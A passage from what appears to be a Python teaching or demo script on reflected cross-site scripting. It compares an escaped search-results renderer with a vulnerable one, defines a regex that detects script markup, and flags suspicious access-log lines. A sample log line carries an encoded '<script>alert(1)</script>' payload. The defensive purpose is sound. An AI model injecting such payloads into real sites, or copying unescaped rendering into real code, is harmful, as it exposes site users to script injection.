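    """Same page; every untrusted value is HTML-escaped at output time."""
    items = "".join(f"<li>{html.escape(h)}</li>" for h in hits)
    return f"<h1>Results for {html.escape(query)}</h1><ul>{items}</ul>"


# Crude marker for active content; enough to compare the two renderers.
SCRIPT_RE = re.compile(r"<\s*script\b|javascript\s*:", re.IGNORECASE)


def contains_active_markup(page: str) -> bool:
    return SCRIPT_RE.search(page) is not None


def flag_suspicious_requests(log_lines: list) -> list:
    """Defender side: return access-log lines whose query string carries script
    markup, percent-decoding first so %3Cscript%3E is caught as well."""
    flagged = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        decoded = unquote(urlsplit(m.group(1)).query)
        if SCRIPT_RE.search(decoded):
            flagged.append(line)
    return flagged


# Constructed access-log lines (Common Log Format) for the demonstration.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2003:10:01:02 +0000] "GET /search?query=vivisimo HTTP/1.1" 200 5120',
    '10.0.0.7 - - [18/Oct/2003:10:01:09 +0000] "GET /search?query=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300',
    '10.0.0.9 - - [18/Oct/2003:10:02:11 +0000] "GET /robots.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    q = query_from_url(DEMO_URL)
    print("vulnerable page carries script:", contains_active_markup(render_results_vulnerable(q, [])))
    print("fixed page carries script:", contains_active_markup(render_results_fixed(q, [])))
    print("flagged log lines:", len(flag_suspicious_requests(SAMPLE_LOG)))
```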